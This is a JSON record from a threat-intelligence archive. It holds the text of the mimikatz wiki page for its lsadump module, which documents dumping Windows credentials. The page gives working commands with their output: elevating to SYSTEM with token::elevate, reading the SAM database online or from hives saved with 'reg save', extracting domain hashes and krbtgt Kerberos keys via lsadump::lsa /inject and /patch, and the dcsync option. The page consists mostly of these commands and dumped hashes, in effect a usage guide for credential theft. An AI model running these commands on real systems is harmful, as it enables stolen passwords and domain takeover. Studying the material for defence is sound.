{
	"id": "7623df29-5aee-4cfc-b70f-af782d172e80",
	"created_at": "2026-04-06T00:14:15.2065Z",
	"updated_at": "2026-04-10T03:21:43.433243Z",
	"deleted_at": null,
	"sha1_hash": "bebedcc213faa1d3a21b7bcec3c34266bd024b8b",
	"title": "module ~ lsadump",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 73031,
	"plain_text": "module ~ lsadump\r\nBy gentilkiwi\r\nArchived: 2026-04-05 18:27:41 UTC\r\nCommands: sam, secrets, cache, lsa, trust, backupkeys, rpdata, dcsync, netsync\r\nsam\r\nThis command dumps the Security Account Managers ( SAM ) database. It contains NTLM, and sometimes LM\r\nhash, of users passwords. It can work in two modes: online (with SYSTEM user or token) or offline (with SYSTEM\r\n\u0026 SAM hives or backup)\r\nonline\r\nIf you're not SYSTEM or using an impersonated SYSTEM token, you'll have access denied error:\r\nmimikatz # lsadump::sam\r\nDomain : VM-W7-ULT-X\r\nSysKey : 74c159e4408119a0ba39a7872e9d9a56\r\nERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)\r\nIn this case, you can use psexec to begin SYSTEM (or other tools) or elevate with token::elevate command to\r\nimpersonate a SYSTEM token:\r\nmimikatz # privilege::debug\r\nPrivilege '20' OK\r\nmimikatz # token::whoami\r\n * Process Token : 623884 vm-w7-ult-x\\Gentil Kiwi S-1-5-21-1982681256-1210654043-1600862990-1000 (14g,24p\r\n * Thread Token : no token\r\nmimikatz # token::elevate\r\nToken Id : 0\r\nUser name :\r\nSID name : AUTORITE NT\\Système\r\n228 24215 AUTORITE NT\\Système S-1-5-18 (04g,30p) Primary\r\n -\u003e Impersonated !\r\n * Process Token : 623884 vm-w7-ult-x\\Gentil Kiwi S-1-5-21-1982681256-1210654043-1600862990-1000 (14g,24p\r\n * Thread Token : 624196 AUTORITE NT\\Système S-1-5-18 (04g,30p) Impersonation (Delegatio\r\nmimikatz # lsadump::sam\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump\r\nPage 1 of 5\n\nDomain : VM-W7-ULT-X\r\nSysKey : 74c159e4408119a0ba39a7872e9d9a56\r\nSAMKey : e44dd440fd77ebfe800edf60c11d4abd\r\nRID : 000001f4 (500)\r\nUser : Administrateur\r\nLM :\r\nNTLM : 31d6cfe0d16ae931b73c59d7e0c089c0\r\nRID : 000001f5 (501)\r\nUser : Invité\r\nLM :\r\nNTLM :\r\nRID : 000003e8 (1000)\r\nUser : Gentil Kiwi\r\nLM :\r\nNTLM : cc36cf7a8514893efccd332446158b1a\r\noffline\r\nYou can backup SYSTEM \u0026 SAM hives with:\r\nreg save HKLM\\SYSTEM SystemBkup.hiv\r\nreg save HKLM\\SAM SamBkup.hiv\r\nOr use Volume Shadow Copy / BootCD to backup these files:\r\nC:\\Windows\\System32\\config\\SYSTEM\r\nC:\\Windows\\System32\\config\\SAM\r\nOf course, you can also use files directly from another Windows location.\r\nThen\r\nmimikatz # lsadump::sam /system:SystemBkup.hiv /sam:SamBkup.hiv\r\nDomain : VM-W7-ULT-X\r\nSysKey : 74c159e4408119a0ba39a7872e9d9a56\r\nSAMKey : e44dd440fd77ebfe800edf60c11d4abd\r\nRID : 000001f4 (500)\r\nUser : Administrateur\r\nLM :\r\nNTLM : 31d6cfe0d16ae931b73c59d7e0c089c0\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump\r\nPage 2 of 5\n\nRID : 000001f5 (501)\r\nUser : Invité\r\nLM :\r\nNTLM :\r\nRID : 000003e8 (1000)\r\nUser : Gentil Kiwi\r\nLM :\r\nNTLM : cc36cf7a8514893efccd332446158b1a\r\nsecrets\r\ncache\r\nlsa\r\nmimikatz # lsadump::lsa /id:500\r\nDomain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670\r\nRID : 000001f4 (500)\r\nUser : Administrateur\r\nERROR kuhl_m_lsadump_lsa_user ; SamQueryInformationUser c0000003\r\nmimikatz # lsadump::lsa /inject /name:krbtgt\r\nDomain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670\r\nRID : 000001f6 (502)\r\nUser : krbtgt\r\n * Primary\r\n LM :\r\n NTLM : 310b643c5316c8c3c70a10cfb17e2e31\r\n * WDigest\r\n 01 54a52c7ef73ebe90194c083129d6ac81\r\n 02 9fa3bb508e7b3646efa65acbd22e2af9\r\n 03 e185f5c75b64f94e5716a1e42e37794d\r\n 04 54a52c7ef73ebe90194c083129d6ac81\r\n 05 9fa3bb508e7b3646efa65acbd22e2af9\r\n 06 5dd4ee69b653c5c9aad64a393b6a9700\r\n 07 54a52c7ef73ebe90194c083129d6ac81\r\n 08 7bedf3c0186f4af47c95724fbeed7a44\r\n 09 7bedf3c0186f4af47c95724fbeed7a44\r\n 10 80e30fbce1952fc7aa5778f51ffad4d8\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump\r\nPage 3 of 5\n\n11 1c05ad8928e14f380db8a831c1946fe3\r\n 12 7bedf3c0186f4af47c95724fbeed7a44\r\n 13 c33523d429bce0c392c89ac2d301ae6c\r\n 14 1c05ad8928e14f380db8a831c1946fe3\r\n 15 536c8128d7cf8667164ed762ad2fb9e6\r\n 16 536c8128d7cf8667164ed762ad2fb9e6\r\n 17 a1c4b9e13d6679796398e4cacad0cb03\r\n 18 3f36213dfa4ea6f9e505a60c58c6393a\r\n 19 dfda9df26d75e40b1639cf9305937f51\r\n 20 b469efd6b8bff67312a09918526ef080\r\n 21 49a1ad8ee21e79f44a8033e189616981\r\n 22 49a1ad8ee21e79f44a8033e189616981\r\n 23 079b50c03444176568e0732db7e65b85\r\n 24 3885d7b1fa11fd86e892e2aaab4c0aec\r\n 25 3885d7b1fa11fd86e892e2aaab4c0aec\r\n 26 5bd64f5d0bcca6c10ccbf2fbb5043a74\r\n 27 9c546227d4c3bbbd4a5a6065dd7b7213\r\n 28 e776b6660b25384f87d55cc300657d13\r\n 29 26c87bd1a9c48e652f83431bf20227c2\r\n * Kerberos\r\n Default Salt : CHOCOLATE.LOCALkrbtgt\r\n Credentials\r\n des_cbc_md5 : 620eb39e450e6776\r\n * Kerberos-Newer-Keys\r\n Default Salt : CHOCOLATE.LOCALkrbtgt\r\n Default Iterations : 4096\r\n Credentials\r\n aes256_hmac (4096) : 15540cac73e94028231ef86631bc47bd5c827847ade468d6f6f739eb00c68e42\r\n aes128_hmac (4096) : da3128afc899a298b72d365bd753dbfb\r\n des_cbc_md5 (4096) : 620eb39e450e6776\r\nmimikatz # lsadump::lsa /patch\r\nDomain : CHOCOLATE / S-1-5-21-130452501-2365100805-3685010670\r\nRID : 000001f4 (500)\r\nUser : Administrateur\r\nLM :\r\nNTLM : cc36cf7a8514893efccd332446158b1a\r\nRID : 000001f5 (501)\r\nUser : Invité\r\nLM :\r\nNTLM :\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump\r\nPage 4 of 5\n\nRID : 000001f6 (502)\r\nUser : krbtgt\r\nLM :\r\nNTLM : 310b643c5316c8c3c70a10cfb17e2e31\r\nRID : 00000452 (1106)\r\nUser : equipement\r\nLM :\r\nNTLM : 57a087d98bfac9df10df27a564b77ad6\r\nRID : 00000453 (1107)\r\nUser : utilisateur\r\nLM :\r\nNTLM : 8e3a18d453ec2450c321003772d678d5\r\nRID : 000003e9 (1001)\r\nUser : SRVCHARLY$\r\nLM :\r\nNTLM : cfe67c8e5e5bab99b911302728152ab3\r\nRID : 00000450 (1104)\r\nUser : WIN81$\r\nLM :\r\nNTLM : ad0344245f24e4927d9480559c7f8842\r\nRID : 00000451 (1105)\r\nUser : WINXP$\r\nLM :\r\nNTLM : d2624e317aa4d245b7dad2942444d7f7\r\ndcsync\r\nThis command uses DRSR protocol to ask a domain controller to synchronize a specified entry. It's the same\r\nprotocol that domain controllers are using between them.\r\nIt was co-writed with Vincent LE TOUX ( vincent.letoux [at] gmail.com / http://www.mysmartlogon.com )\r\nArgument:\r\n/domain - optional - the FQDN of the domain you want to synchronize (default: your current domain)\r\n/dc - optional - the FQDN of the domain controller you want to synchronize (default: autodected by the\r\ndomain name)\r\nSource: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump\r\nhttps://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump"
	],
	"report_names": [
		"module-~-lsadump"
	],
	"threat_actors": [],
	"ts_created_at": 1775434455,
	"ts_updated_at": 1775791303,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bebedcc213faa1d3a21b7bcec3c34266bd024b8b.pdf",
		"text": "https://archive.orkl.eu/bebedcc213faa1d3a21b7bcec3c34266bd024b8b.txt",
		"img": "https://archive.orkl.eu/bebedcc213faa1d3a21b7bcec3c34266bd024b8b.jpg"
	}
}